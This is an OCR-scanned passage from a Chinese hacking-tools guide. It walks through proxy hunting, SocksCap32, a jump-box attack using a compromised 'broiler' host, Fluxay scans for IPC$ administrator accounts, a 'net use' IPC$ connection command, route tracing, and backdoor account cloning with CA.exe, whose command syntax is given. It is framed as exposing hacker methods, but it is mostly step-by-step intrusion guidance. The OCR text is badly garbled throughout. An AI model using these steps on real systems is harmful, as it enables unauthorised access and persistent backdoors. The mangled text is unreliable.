代理 服务 器 可 用 于 局 域 网 计算 机 与 Internet 连接 时 共享 上 网 , 而 黑客 则 可 通过 代理 服务 
人 右 软件 对 东台 计算 机 进行 扫描 ， 从 而 截获 目标 计算 机 的 重要 信息 ， 以 达到 目 己 入 侵 的 目的 。 


111.1 利用 “代理 猎手 ” 找 代理 


“代理 猎手 ”是 一 蒜 集 搜索 与 验证 于 一 身 的 软件 ， 可 以 快速 查找 网 络 上 的 免费 Proxy。 其 主 
要 特点 为 : 文 持 多 网 址 段 、 多 并 口 目 动 查询 ; 文 持 自动 验证 并 给 出 速度 评价 ， 文 持 后 续 的 时 间 
预测 ， 文 持 用 户 设置 最 大 连接 数 《〈 可 以 做 到 不 影响 其 他 网 络 程序 ) 并 运行 自动 查找 最 新 版 本 ， 
最 大 的 特点 是 搜索 速度 快 ， 最 快 可 以 在 十 几 分 钟 搜 完整 个 B 类 地 址 的 65 536 个 地 址 。 

可 以 通过 百度 、 雅 虎 、 新 滔 等 搜索 引擎 查找 “代理 猪手 ”下 载 链接 并 进行 下 载 。 

1. 添加 搜索 任务 

在 “代理 猪手 ”安装 完毕 后 ， 还 需要 添加 相应 的 搜索 任务 ， 具 体 的 操作 步骤 如 下 。 


STEP01: 启动 “代理 猎手 ” STEP02: 添加 搜索 任务 


女 代理 猪手 Eo 


系统 (S)| 搜索 任务 (T) | 搜索 结果 (R) 代理 调度 (U) ”辅助 工具 (P) 窗口 (W) “帮助 (H) 


Yaa 


搜索 任务 | 搜索 结果 “代理 调度 | 


代理 调度 列表 


GUE 全 部 
师 | 降 
重 全 
者 风 


任务 列表 
EE 
， 村 伟 | 

» f | 


选择 “搜索 任务 ”>“ 添 加 任务 ”菜单 命令 。 国 选择 任务 类 型 。 。 国 单 击 “ 下 一 步 ” 按钮。 


STEP03: ”地址 范围 设置 STEP04: 添加 搜索 IP 范围 


地 址 范围 类 型 : | 起 止 地 址 范围 | 
起 始 地 址 : | 192 .168 . 1 .0 


地 址 范围 


主机 I<) 械 名 查询 本 机 IF 地 址 a 1B8 1 吕 癌 


类 型 “| 起 始 地 址 结束 地 址 


果 除 | 
清除 || 


TE 
单 击 “ 添 加 ”按钮 , 此 为 第 一 种 添加 IP 地 址 范围 的 ”图 设置 iP 地址 范围 。 ”图 单 击 “ 确 定 ” 按钮 。 
方法 。 
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客 志 
PE 工具 人 攻 了 


信人 人 
STEP05: 1|P 地 址 范围 添加 成 功 STEP06: 进入 “预定 义 的 上 地 址 范围 ”对 话 框 


预定 义 的 IP 地 址 范围 


地 址 范围 
主机 IPC) 械 名 “| ， 查 鹿 习 机 地 直 


类 型 ”| 起 始 地 址 结束 地 址 | | 
起 止 地 址 |192. 168. 1.0 |192.168.1.88 | 


《上 一 步 @) | 下 一 步 0n >| 取消 | 帮助 | 二 
查看 已 添加 的 国 单 击 “选取 已 定义 单 击 “ 添 加 ”按钮 ， 此 为 第 二 种 添加 IP 地 址 范围 的 


IP 地 址 范围 。 的 范围 ”按钮 。 方法 。 
STEP07: 添加 搜索 IP 地 址 范围 STEP08: 查看 已 定义 的 IP 地址 范围 


起 始 地 址 结束 地 址 


地 址 范围 类 型 : [ESTEEE EA 
起 抬 地 址 : [92 168 1 0 
结束 地 址 : [82 168 1 6- 

地 址 范围 6: 


辆 根据 实际 情况 设置 |P 地 址 范围 ， 国 单 击 “ 确 定 ” 图 已 添加 的 IP 地 址 范围 。 图 单 击 “ 打 开 ” 按钮 。 
并 输入 相应 的 地 址 范围 说 明 。 ”按钮 。 


STEP09: 读 入 地 址 范围 STEP10: 返回 “已 定义 的 上 地址 范围 ”对 话 杠 


FFI AN 


已 定 炎 的 TP 地址 范围 
起 始 地 址 结束 地 址 | 备注 
192.168.1.0 |192.168.1.88 | 


查 技 范围 如 :| 国文 档 


我 的 文档 (12) 


| 


厂 以 只 读 方 式 打开 (R) 


选 定 已 预 设 IP 地 址 ，” 国 单 击 “打开 ”按钮 。 
范围 的 文件 。 


单 击 “ 使 用 ”按钮 ， 即 可 将 预 设 的 IP 地 址 沁 围 添加 
到 搜索 IP 地 址 范围 中 。 
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1 


网 络 代 理 与 退 踪 技术 


STEP11: 返回 “地 址 范围 ”界面 STEP12: 打开 “端口 和 协议 ”界面 


一 


地 址 范围 端口 和 协议 
选取 已 定义 的 范围 |。 主机 IP<-y 或 名 ”| ”查询 本 机 ?地 址 | 入 
_ 起 始 地 址 | 结束 地 址 
192.168.1.0 192. 168. 1.88 | 修 区 | 

是 除 | 


清除 


单 击 “ 下 一 步 ”按钮 。 单 击 “添加 ”按钮 。 
STEP13: ” 添 加 端口 和 协议 STEP14: 返回 “端口 和 协议 ”界面 


起 输 庙 口 ， 结 束 庙 口 协议 是 否 必 搜 | 迁 用 | 
Eons es 


根据 实际 情况 选择 端口 。 图 单 击 “确定 ” 按钮 。 单 击 “ 完 成 ”按钮 ， 完 成 搜索 任务 的 设置 。 


2. 设置 参数 
在 设置 好 搜索 的 卫 地 址 范围 之后 ， 了 吏 可 以 开始 进行 搜索 了 ， 但 为 了 提高 搜索 效率 ， 还 
有 必要 先 设 置 一 下 “代理 狂 手 ”的 各 项 参数 。 具 体 的 操作 步 又 如 下 。 


STEP01: 打开 “代理 猎手 ”窗口 STEP02: 运行 参数 设置 


搜索 验证 设置 | 验证 数据 设置 | 代理 调度 设置 | 其 它 设置 | 
而 El 加 | ES 也 外 | -搜索 设置 - 验证 设置 - 
连接 超时 时 间 : 后 s 连接 超时 时 间 : [io <s 
搜 伐 任 务 | 搜索 结果 “代理 调度 | 验证 超时 时 间 : 四 s 验证 超时 时 间 : Oo 
一 - -代理 1 周 度 列 表 一 二 并 发 连接 数目 : [iuo 并 发 连接 数目 :Ji00 
-局 域 网 或 拨号 上 网 
厂 通过 Pine 主 机 确认 网 络 通畅 。 主机 TP 地 址 : 厂 ”检查 | 


搜索 方法 - 
一 克 启用 先 Ping 后 连 的 机 制 并 发 数 里 : [iao 重复 次 数 : | ”“ 


-其 它 设置 


2 | 


-任务 列表 
[状态 ”| 数据 量 “| 时 间 特 性 | 


弃 : 搓 风 用 户 代理 :| Wozilla/4.0 (compatible; MSIE 4.01; Windows 98) | 


兰 淹 连接 192.168.0.255:10800( | 总 共 100 个 并 发 对 做 , 100 个 但 |S 12:33:30 |99%|E 12:36:01 |N 12:36:02 


选择 “系统 ”> “参数 设置 ”菜单 命令 。 色 选 “启用 先 Ping 后 连 的 机 制 ” 复 选 框 以 提高 搜索 
效果 。 
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如 栗 用 户 的 囊 客 无 法 达 


工具 全 攻略 


“代理 猎手 ”默认 的 搜索 、 验 证 和 ping 的 并 发 数量 分 别 为 50、80 和 100， 


小 技巧 负担 ， 


到 ， 最 好 相应 地 减少 各 个 并 发 数量 ， 以 减轻 网 络 的 


STEPO3: 


搜索 验证 设置 ”验证 数 
验证 数据 设置 


验证 数据 设置 


据 设置 | 代理 调度 设置 | 其 它 设置 | 


验证 资源 地 址 ; 
验证 资源 参数 : 


www. Yahoo. com 
[yahoo! ! 


STEPO4: 


代理 调度 设 


置 


搜索 验证 设置 | 验证 数据 设置 ”代理 调度 设置 | 其 它 设置 | 


一 代理 调度 参数 设置 
jy 使 用 代理 调度 功能 


厂 允许 其 它 机 器 使 用 本 机 的 自动 调度 功能 


代理 调度 监听 端口 : [6080 
| 启用 本 地 域名 解析 及 绎 ;中 功能 


代理 调度 范围 设置 
jv 以 下 地 址 不 使 用 代理 服务 器 
地 址 类 型 “| 起 始 地 址 


[添加 | 修 次 |  m 除 | 


| 结束 地 址 


句 IF 范 围 192. 168.0.1 
回 I 范 围 192. 168.1.0 


192. 168. 0.88 
192. 168. 1.255 


可 添加 、 修改 和 删除 验证 资源 地 址 及 其 参数 。 


STEP05: 其 他 设置 


搜索 验证 设置 | 验证 数据 设置 | 代理 调度 设置 其 它 设置 | 


设置 代理 调度 参数 及 代理 调度 范围 等 选项 。 


STEP06: 返回 主 春 面 


系统 (S) | 接 索 任务 (TD) | 搜索 结果 (R) 代理 调度 (U) ”辅助 工具 (P) 窗口 (W) ”帮助 (H) 


- 按 号 设置 
厂 使 用 拨号 网 络 
找 号 网 络 连 接 : | 欧 市 储 接 


重 江 次 数 : 后 重 试 时 间 间 隔 : 


I” 断 绪 自动 


用 户 名 [| 密 : 


搜索 验证 历史 - 
重 拨 保留 天 数 : 后 
-优化 最 大 网 络 连 接 数 QT 不 需要 ) 
当前 值 : | 还 原 | 
最 优 值 : | | 


上 一 秒 


-运行 参数 


厂 进入 Windows 自 动 运行 

厂 启动 时 自动 开始 搜索 

厂 启动 时 自动 验证 代理 调度 表 

| 禁止 运行 多 个 代理 猎手 程序 

| 关闭 代理 措 手 时 弹出 确认 窗口 

克 搜索 时 定时 自动 保存 [10 ”分钟 


厂 最 晚 关机 时 间 [11:22:48 一 


设置 拨号 、 搜 索 验证 历史 、 运 行 参 


单 击 “ 确 定 ”按钮 。 


厂 启动 时 最 小 化 

lv 最 小 化 时 隐藏 

厂 最 小 化 时 不 在 任务 条 显示 图 标 
厂 搜索 验证 充 毕 自动 弹出 

厂 自动 保存 时 显示 进度 条 

[Y 自动 检查 新 版 本 


这 |] mi | #w | 
， 然后 


参数 等 选项 


3. 查看 搜索 结果 


在 搜索 完毕 之 后 ， 
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束 可 以 伍 看 搜 逐 的 结 末 了 ，} 


DB 


日 


搜索 任务 | 搜索 结果 “代理 调度 | 
代理 调度 列表 


服务 异 
下 用 过 合理 0 


| 


EEE 站 所 流量 


任务 列表 
| 状态 “| 数据 里 


时 间 特 性 


尝试 连接 192.16$#.0.255:10800( | 总 共 100 个 并 发 对 傅 , 100 个 但 |S 12:33:30 |99%|E 12:36:01 |N 12:36:02 jy 


选择 “搜索 任务 ” 
索 设 置 的 |P 地 址 范围 


具体 的 操作 步 


又 如 下 。 


>“ 开 始 搜 索 ” 菜单 命令 , 开始 搜 


-eo 第 11 章 


网 络 代理 与 妃 踊 技术 


STEP01: 查看 搜索 结果 STEP02: 查看 代理 调度 


系统 (S) ”搜索 任务 (1 搂 索 结案 (R) “代理 调度 (U) “辅助 工具 (P) 窗口 (W) ”帮助 (H) 系统 (S) ”搜索 任务 (T) 搜索 结果 (R) “代理 调度 (U) ”辅助 工具 (P) 窗口 (W) ”帮助 (H) 


pgqDjDa 人 a paQaDaagGla 


搜索 任务 ”搜索 结果 | 代理 用 度 | 搜索 任务 | 搜索 结果 ”代理 调度 | 
搜索 结果 [ 共 21 个 ， 1 个 被 选中 ] 代理 调度 列表 
办 调 R ^ 验证 HB 务 弘 志 口 | 类 型 “| 验证 状态 ”| 启用 


任务 列表 
状态 | 数据 里 


尝试 连接 192.168.1.15:14979(H | 总 共 100 个 并 发 对 象 100 个 人 |S 13:05:13 [52% [E 13:41:28 IN 13:24:25 -4 | 并 生 访 192.168.0.255:10800(} | 总共 100 个 并 发 对 象 100 个 |S 12:33:30 [99%[E 12:36:01 IN 12:36:02 /y 
“验证 状态 ”为 “Free” 的 代理 , 即 为 可 以 使 用 的 代理 ”将 找到 的 可 用 代理 服务 器 复制 过 来 ,“ 代理 猎手 ”就 
服务 器 。 可 以 自动 为 服务 器 进行 调度 了 。 多 增加 几 个 代理 服 


务 器 有 利于 网 络 速度 的 提高 。 


1 ) 一 般 情况 下 ， 验 证 状态 为 “Free” 的 代理 服务 器 很 少 ， 但 只 要 了 验证 状态 
@ 为 “Good” 就 可 以 使 用 了 。 
2 ) 用 户 也 可 以 将 搜索 到 的 可 用 代理 服务 器 的 IP 地 址 和 端口 输入 网 页 页 浏览 
提示 器 的 代理 服务 器 设置 选项 中 ， 这 样 ， 用 户 就 可 以 通过 该 代理 服务 器 进行 网 上 冲 
浪 了 。 


11.1.2 用 MocksCap32 设置 动态 代理 


SocksCap32 代理 软件 是 一 于 基于 Socks 协议 的 网 络 代 理 客户 新 软件 , 它 能 将 指定 
软件 的 任何 Winsock 调用 转换 成 Socks 协议 的 请 求 ， 并 友 送 给 指定 的 Socks 代理 服务 
器 。SocksCap32 可 用 于 使 基于 HTTP、FTP、Telnet 等 协议 的 软件 ， 通 过 Socks 代理 
服务 器 连接 到 目的 地 。 a 

使 用 SocksCap32 软件 前 ， 需 要 先 有 一 个 Socks @ Soc 2 oe 
代理 服务 器 《不管 是 用 “代理 猎手 ” 找 出 来 的 ， 还 是 | ?enee Todooloriss，Ine 由 热血 中 文 网 Cv 
从 各 个 代理 网 站 中 得 到 的 )。 目 前 ， 可 以 通过 搜索 引 i 和 
擎 找到 SocksCap32 软件 的 下 载 地 址 ， 并 将 其 下 载 到 者 TY 5 
本 地 磁盘 中 。 ee 前 等 其它 区 有 的 兰 戏 。 网 

1. 建立 应 用 程序 标识 

当 第 一 次 运行 SocksCap32 程序 时 ， 将 显示 
“SocksCap 许可 ”对 话 框 。 在 单 击 “接受 ”按钮 接受 
许可 协议 内 容 之 后 , 才能 进入 SocksCap32 的 主 窗口 。 

建立 应 用 程序 标识 的 具体 操作 步骤 如 下 。 


DO 


rn 
~ - 3 
站 后 这 
芋 划 : E: 
门 Au 


人 
和 


i 
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Py > 
六 和 估 - 工具 全 攻略 


命 人 人 他 
STEP01: 打开 SocksCap32 主 窗口 STEP02: 新 建 应 用 程序 标识 项 


给 SocksCap 控制 台 
文件 (Fi ” 查 春 (V) 帮助 (H) 


单 击 “新 建 ”按钮 。 团 在 “标识 项 名 称 ” 文 本 框 国 单 击 “浏览 ” 
中 输入 新 建 标识 项 的 名 称 。 按钮 。 
STEP03: 选择 需要 代理 的 应 用 程序 STEP04: 返回 主 窗口 


卉 SocksCap 控制 台 ) 
文件 ( ”查看 (V) 帮助 (H) 
修改 日 期 己 
_2013/12/18 15: - : 
2008/4/25 9:57 | 
2006/9/7 16:35 
nar 


国 选 定 需要 代理 的 应 用 程序 。 国 “打开 ” 按钮 。 查看 新 添加 的 应 用 程序 。 


添加 的 应 用 程序 可 以 是 E-mail 工具 、FTP 工具 、Telnet 工具 ， 以 及 当今 最 
提示 “热门 的 联网 游戏 等 。 


2. 设置 选项 
设置 SocksCap32 选项 的 具体 操作 步骤 如 下 。 


STEP01: 打开 SocksCap32 的 主 窗口 STEP02: SocksCap 设置 


SocksCap 设置 


SOCIS 设置 | 直接 连接 | 日 志 | 
忆 定 你 的 50CIS 服务 器 地 址 并 选择 合用 的 通讯 
EE 2 


服务 器 

50CKS 服务 器 : |220. 47.7.27 端 。”|1070 
协议 

个 SOCES 版 本 4 只) 


sS0CES 用 户 标 [hamini strator 


他 S0CKS 版 本 5 5) 
域名 解析 
全 由 本 地 应 解析 所 有 域名 上) 
全 由 坪 端 解析 所 有 域名 R) 
个 先 尝 证 由 本 地 端 肝 由 运 端 角 


支持 的 验证 方式 一 一 一 | 
IY 用 户 名 /密码 0) 


取消 | 应 用 &) | 
选择 “文件 ”>“ 设 置 ” 菜 单 命令 。 在 “SOCKS 设 置 ” 选项 卡 中 对 服务 器 及 协议 进行 
设置 。 
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网 络 代理 与 退 踊 技术 


如 果 用 户 查找 的 代理 服务 器 需要 用 户 名 和 密码 ， 且 已 获得 该 用 户 名 和 密码 ， 则 可 
勾 选 “用 户 名 /密码 ” 复 选 框 。 若 勾 选 “用 户 名 /密码 ” 复 选 框 ， 则 在 单 击 “ 确 定 ” 按 钮 
之 后 ， 需 要 在 “下 图 所 示 的 SocksCap32 Socks5 用 户 名 /密码 验证 ”对 话 框 中 填 入 用 户 
握 直 名 和 密码 ， 


SO0CKS5 用 户 必 : [hdmini strator 
SO0CKS5 密 码 : eekkkr 


取消 | 


STEP03: 添加 直接 连接 的 IP 地 址 等 STEP04: 设置 直接 连接 的 应 用 程序 和 库 
SocksCap 设置 | SocksCap 设置 
SO0CKS 设置 ”直接 连接 | 日 志 


| 
= 
直接 和 连接 的 地 址 


要 汪 加 的 目标 文件 


取消 | 
Bom ee 


s0CFS 版 本 5 直接 连接 的 UP 端口 


应 用 心 ) 


添加 直接 连接 的 IP 地 址 ， 如 192.167.0.2。 也 可 输入 ” 单 击 “添加 ” Ee 
域名 ， 如 .mydomain.com。 也 可 单 击 “添加 ”按钮 ”在 “SOCKS 版 本 5 直接 连接 的 UDP 端口 ”选项 组 中 
通过 IP 地 址 文件 来 添加 。 可 设置 直接 连接 的 UDP 端口 号 。 


STER05 引 设置 日 志 信 息 
SocksCap 设置 
s0CIS 设置 | 直接 连接 日 志 | 
: 评 Y 日 志 功 能 能 帮助 从 断 玉 接 失败 的 原因 |. 


a 
日 志文 [sc32L06. TXT ”| yp 
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客 过 
PE 工具 人 攻 了 


信人 位 也 
在 设置 代理 选项 并 添加 代理 应 用 程序 后 ， 在 应 用 程序 列表 中 选取 须 运 行 的 应 用 程 
序 ， 选 择 “ 文 件 ”>“ 通 过 Socks 代理 运行 ”菜单 命令 ， 即 可 局 动 该 应 用 程序 并 通过 代 
理 进 行 登录 。 如 果 需 要 使 某 个 应 用 程序 通过 SocksCap32 代理 ， 则 必须 通过 SocksCap32 
进行 局 动 。 


11.1.3 远程 跳板 代理 攻击 上 坚 交 


1. 扫描 选择 目标 

这 里 使 用 的 工具 古国 内 至 有 “ 辟 兴 ”的 流光 软件 ， 主 要 推荐 理由 是 它 所 特有 的 一 种 扫 
摘 模 式 : 远程 扫 摘 模式 。 通 过 在 远程 “肉鸡 ”上 和 安 六 该 工具 ， 束 可 以 轻易 实现 远程 的 跳 
板式 扫 摘 。 

具体 的 操作 步骤 如 下 : 
STEP01: 运行 “流光 软件 ” STEP02: 主机 扫描 设置 


[图 小 榕 软件 - 【流光 5.0】 Build 3310 (442 用 户 ) | 主机 扫 拉 设置 


文件 (有) ” 编 铝 (E) 壹 者 (V) 选项 (O) 工具 0T) 者 助 (H) 关于 (A) 
-扫描 范围 


开始 地 址 : 1192.168.0.1 
主机 
Es a D3 
和 结束 地 址 : [192.168.1|255 
白 回电 192. | 


有 
回 卢 显 


扫描 主机 类 型: |wr/s8 "| 


si w 加 常用 密码 扫描 园 将 FrontPage 主 机 自动 加 入 HTTP 主 机 列表 
! 观 扫 疾 POP3/FTP/NT/SQL 主 机 (9).. rl+ 
因 将 扫描 成 功 的 结果 加 入 当前 设置 ”| 确定 (0) | | 取消 四 | 


选择 “探测 ”>“ 扫 描 POP3/FTP/NT/SQL 主 机 " 菜 ” 国 输入 扫描 范围 并 选择 扫 ” 国 单 击 “ 确 定 ”按钮 。 
ws 


单 命令 。 描 类 型 为 “NT/98” 选 项 。 
STEP03: 开始 扫描 目标 主机 STEP04: 查看 扫描 结果 
| 图 小 榕 次 件 -_【 污 光 5.0】 Build 3310 (442 用 户 ) [= 器 Zs) 


[sp 编 往 E) 可 看 VW 探 (R)_ 迁 硕 (0) 工具 (帮助 (H)， 关于 (A) 


] 到 BP POP3 主 机 
a 192, 168, 1. 100 : PORT : NT/98 
台中 显示 所 有 大 上 192., 168, 1.88 : PORT : NT/98 
WE 192,168,1,55 : PORT : NT/98 
‘SD 1s2168.1.1 192.168.1.15 : PORT : NT/98 


192,.168.1.4: PORT : NT/98 
192, 168, 1, 10 :PORT : NT/98 


| 日- 加 时 192.165.0.10 
日 - 团 乙 D: 皮 装 FiuxayWame,dic 
团 显示 所 有 项 目 


国 小 次 软件 实验 室 1995-2002 小 净 作 品 版 权 所 有 


一 | 一 一 | 四 155/511 


单词 075/080 探测 速度 


正在 扫描 ， 单 击 “ 停 止 ”按钮 可 中 断 扫 描 。 查看 扫描 结果 ， 单 击 “ 确 定 ” 按 钮 关闭 该 对 话 框 。 
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STEP05: 返回 主 窗口 


辆 小 性 软 件 - [流光 5.0】 Build 3310 (442 月 户 ) 
文件 ( ”编辑 (E) 查看 (V) 探测 (R) “选项 (O) 工具 (T) “帮助 (H) 关于 (A) 


| 六 口 因 FoRM 主机 
| : 口 配 ssQl 主机 


Sun Solaris 用 户 列 表 (Finger).. 


Sun Solaris FTP 验证 用 户 .. 


Ctrl+F9 


在 “IPC$ 主 机 ”下 所 扫描 出 的 目标 主机 中 任 选 一 个 
右 击 ， 从 快捷 菜单 中 选择 “探测 ”> “探测 IPC$ 用 户 
列表 ”命令 。 


STEP07: 返回 主 界 面 


… 回 图 192.168.1.15 


… 回 图 192.1658.1.55 
由 - 回 轩 192.168.1.88 


口 -回国 EE 
中 3 Administrator (Admin) 


2. 代理 跳板 的 架设 


< 第 1] 章 
网 络 代理 与 追踪 技术 


STEP06: 1IPC 自动 探测 


IPC 自 动 探测 


是 百 在 成 功 获得 用 户 名 后 立即 开始 简单 模式 探测 ? 


当 探 测 到 一 个 hdministrators 肝 ,线程 即 告 结束 


国 为 能 直接 获得 更 大 权限 ， 色 选 


单 击 外 人 3 
“ 仅 探 测 Administrators 组 的 用 户 ” 按钮 。 


复 选 框 。 


查看 在 目标 主机 下 探测 到 的 用 户 。 


代理 架设 的 方法 很 人 蚀 单 ， 具 体 的 操作 步 怒 如下。 


1) 通过 3389 远程 登录 目 己 的 “肉鸡 ” 单 击 “ 开 始 ” 按 钮 , 在 搜索 文本 框 中 输入 “cmd”， 


即 可 进入 命令 提示 符 窗 口 。 


2) 在 当前 命令 提示 符 下 输入 “net use \\ 192.168.0.55""/user:"Administrator"” 命 令 ， 即 


可 建立 空 连接 。 稍 等 片刻 ， 就 会 显示 “命令 


执行 成 功 ” 信 息 。 


11.2 常见 的 黑客 奶 路 工具 曝光 


随 少 网 络 应 用 技术 的 有 发展， 黑客 吉利 利用 专门 的 退 踪 工具 来 退 踪 和 攻击 远程 计算 机 。 


在 本 市 将 曝光 几 球 第 见 的 黑客 退 踪 工具 。 


11.2.! 下 人 妃 踩 撤 术 有 星光 


在 网 络 管理 中 种 第 需要 奉 找 黑客 或 者 是 其 他 不 怀 好 意 的 网 民 的 行踪 ， 如 何 才能 实 
现 精 确 地 定位 菏 个 IP 地 址 的 所 在 地 ?实际 上 ， 使 用 一 些 人 简单 的 命令 和 方法 就 可 以 实现 


墨客 退 踩 。 


要 实现 网 络 定 位 ， 最 简单 的 方法 就 是 在 IP 地 址 得 询 网 站 上 进行 奏 询 。 
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Fa Ms 
人 和- 工具 全 攻略 


合 人 人 他 
STEP01: 打开 IP 地 址 查询 网 站 STEP02: 查找 已 知 的 IP 地址 
到 Pp) ~ 安全 (5) ” 工具 (0) > 各 ~ oO ee w= CR 
@- pcn 
手机 、 电 话 号 码 数 据 库 。 二 维 码 生成 
202.168.0.1 
当前 IP : 411.194.131.77 来 自 : 北京 市 联通 查询 的 IP : 282.163.6.1 


GeolP- Beijjng. China GeolP: Australia 


TPG Internet Pty Ltd 


关 a 主机 打造 新 标准 


wcndns com 


美 答 互 联 # ar Tt 弹性 


扩展 ， 在 线 管 理 
© , 
打开 http:fAwwwiip.cn 网 站 。 输入 要 查询 的 |P 地 址 ， 单 击 “ 查 询 ”按钮 ， 即 可 得 


到 需要 的 地 址 。 


11.2.2” Ne0Tiace 追踪 工具 曝光 


NeoTrace Pro v3.25 是 一 球 网 络 路 由 奶 踊 软件， 用 户 只 须 输入 远程 计算 机 的 E-mail、 
ee URL 等 , 它 就 会 目 动 帮助 用 户 显 示 介 于 本 地 计算 机 与 远程 计算 机 之 间 的 所 
ss # 记 信息 。 
装 和 使 用 NeoTrace 退 踩 工具 的 具体 操作 步骤 如 下 。 


STEP01: ”下载 并 安装 NeoTrace Pro 


双击 桌面 上 的 NeoTrace Pro 图 标 ， 即 可 打开 
四 Nedlrace~、 NeoTrace 主 窗口 。 


Neclrace 
wee Today 


STEP02: 开始 追踪 


在 “Target” 文 本 框 中 输入 想 要 追踪 的 网 址 
( www.google.com)，, 单 击 右 侧 的 “Go” 按 钮 ， 开 
始 进 入 追踪 状态 。 


02 岂 扫描 完毕 后 ， 在 NeoTrace 主 窗口 中 查看 该 网 站 
的 节点 和 摘要 信息 。 


单 击 “Save” 按 钮 。 


ns 


STEP03: 保存 追 踩 到 各 


Save Trace or Map Image | 
-不 |) ， 计 般 W 本 地 开盘 (F] 新 疆 文 件 夹 (2) J 
@ | 


STEPO4: 


Ga 


的 信息 以 文本 文档 的 形式 保存 。 


STEP05: 返回 NeoTrace 主 窗口 


STEP06: 切换 至 “Timing” 选 项 卡 


各 NecTnee wwwgoogecom 9 


| 
肉 入 文件 名 并 单 击 “ 保 存 ， 按 钮 ， 可 将 当前 追踪 到 


‘previous | Neodel4aof14 | Ne 
Time 213 ms 


-本 ec。 | Mop view -Br | Bs 是 copy 本 win 日 Fing 党 Optone 全 ori nwo 加 


i 
昌国 忆 昌 Eaernal yppe > | 


网 络 代 理 与 妃 踊 技术 


双击 已 存储 的 文本 文档 


文件 (P” 编 名 (E) 格式 (0) 查看) 帮助 (H) 保 仓 至 有 道 笔 (F9) 


当前 信息 ,bd 
NeoTrace Version 3.25 - TRIAL Trace Results 
Target : wr. go0g1e. com 
Date: 2014/9/15 (Monday), 16:55:58 
Nodes: 14 


Location 

= 192. 168.1.10 Dayton 

= 过 dead72 Unknowm 
- 111.194.72.1 Unknowm 
- 61,.51. 246.125 Unknowm 
= 61.148.7. 49 Unlnom 
- 124. 65.194.101 Unknom 
— 219. 158. 100. 158 Unknowm 
- 219.158.23.22 ”Unknom 


e Lov Tot Lost 
ee 


0 
0 
0 
0 
0 


查看 追踪 的 详细 列表 。 


单 击 “Network” 标 签 。 


查看 该 网 站 的 网 络 信 息 。 


单 击 “Timing” 标 签 。 


查看 该 网 站 的 各 种 响应 时 间 以 及 发 送 与 丢失 的 
数据 包 等 信息 。 
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ST IF 一 一 


今 公 人 位 
STEP07: 


本 ee 


工具 全 攻略 


加 mc Pene 加 sve 电 copy 怠 pim | @png 人 Bonine Help [eg 
| 


查看 Google 网 站 对 应 的 各 个 节点 


oo) 


单 击 “Map View” 下 拉 按 钮 , 在 弹出 菜单 中 
选择 “Node View” 选 项 。 


加 加 查看 Google 网 站 对 应 的 各 个 节点 。 
国 单 击 “Options ”按钮 。 
Serey | Pogson | Newod Tue | 


Version 325 - TRAL 


STEPO8: 
Options 和 


Speed Indicators 
Nap | 


Pingeing 
General 


打开 “Options” 对 话 框 


| Fonts 
List and Hode 


Workspace Settings 
[lv Text labels on toolbar 

[lw Check for new versions 
厂 LoadNeoTrace Today 


[w Trace sound 
[w Ping sound 
[w 5how startup Screen 


Location Determination 


[Use DNS LOC to aid in determining location 


Cache 
DNS cache expires after 


[a0 days 
[30 days 


“WHOIS cache expires after: 


[80 daws 


Location cache expires after: 


[Use Network Infoto aid in determining location 


对 工作 区 、 地 理 位 置 、 缓 冲 、 地 图 、 列 表 和 节点 、 
pinging、 速 度 指 示 器 以 及 字体 等 属性 进行 设置 。 


Hackerwwatch ID Settings | Clear Trace History | 


Clear DNS | 
Clear wHDI5 | 
Clear Location | 
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黑客 攻击 目标 主机 主要 是 为 了 获取 系统 账户 名 称 和 登录 密码 ， 从 而 以 系统 
管理 员 的 身份 控制 目标 主机 系统 。 本 章 介绍 了 黑客 攻防 中 各 种 获取 和 保护 账户 
和 密码 的 方法 以 及 系统 服务 后 门 的 创建 方法 。 


〇 使 用 软件 克隆 账号 及 手动 克隆 账号 曝光 
OO 使 用 Instsrv 和 Srvinstw 创建 系统 服务 后 门 曝 光 
O 检测 系统 中 的 后 门 程序 


客 过 
-区 -工具 人 攻 了 


二 一 


后 门 账号 古 黑客 在 第 一 次 入 侵 成 功 后 ， 在 远程 主机 内 部 建立 的 一 个 备用 省 理 员 账号 ， 
以 便 其 使 用 管理 员 权 限 再 次 进入 该 系统 ， 而 这 个 账号 在 一 般 系 统管 理 员 看 来 ， 只 拥有 user 
组 的 权限 。 克 隆 账 号 就 是 把 系统 中 存在 的 某 一 个 账号 设置 为 拥有 系统 官 理 员 权限 的 账号 ， 
殉 隆 出 来 的 账号 无 法 用 “账号 管理 ” 俘 出 该 账号 的 真实 权限 。 因 此 ， 克 隆 账 号 常 被 入 侵 者 
作为 “后 门 账号 ”。 了 解 黑 客 殉 隆 账 写 的 手法 ， 才 能 做 好 预防 工作 。 


12.41 使 用 软件 克隆 账号 曝光 


下 面 以 小 榕 的 CA.exe 为 例 上 曝光 元 隆 账 号 的 过 程 。 用 户 启 动 该 软件 后 ,只 须 使 用 简单 的 
命令 便 可 完成 元 隆 操作 。 

CA.exe 是 一 个 远程 克隆 账号 工具 ， 其 命令 格式 为 : 

ca.exe \IP< 账 号 >< 密 码 >< 克 隆 账 号 >< 密 人 >。 

各 参数 的 含义 如 下 。 

@ < 账 写 >: 被 克隆 的 账号 (拥有 管理 员 权限 )。 

@ -密码 >， 被 克隆 账号 的 密码 。 

@ < 克隆 账 写 >: 元 隆 的 账号 (该 账号 在 元 隆 前 必须 存在 )。 

@ -密码 >， 设 置 克隆 账号 的 密码 。 


STEP01: 将 CA.exe 保存 在 根 目 录 下 方 STEP02: 单 击 “运行 ” 


计算 机 


DOs" Hn; Wh EY ， 


控制 面板 
组 织 Y 打开 新建 文件 去 设备 和 打印 机 
默认 程序 
FF 收藏 夫 
四 下 载 
于 | 点 面 
是 最 乒 访 问 
梧 库 BS 
下 载 CA.exe 后 将 其 解压 到 除 系统 分 区 外 的 其 他 分 “ 国 单 击 桌 面 左下 角 的 辆 在 弹出 的 “开始 ”菜单 
区 根 目录 下 ， 例 如 解压 到 E 盘 。 “开始 ”按钮 。 中 单 击 “运行 ”命令 。 


STEP03: 输入 “cmd” 命 令 


7 Windows 将 根据 您 所 输入 的 名 称 ， 为 您 打开 框 应 的 程序 、 
-一 文件 夫 、 文 栏 或 Internet 资源 。 


国 弹 出 “运行 ”对 话 框 ， 在 “打开 ”文本 框 中 
输入 “cmd” 命 令 。 
国 输入 完毕 后 单 击 “ 确 定 ”按钮 。 
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< 人 第 12 章 
后 门 技术 


STEP04: 查看 CA.exe 的 语法 功能 STEP05: 克隆 账号 


ECNWWindows\system32\cmd.exe Clone Privillege of fdministrator to IUSR_UIC 
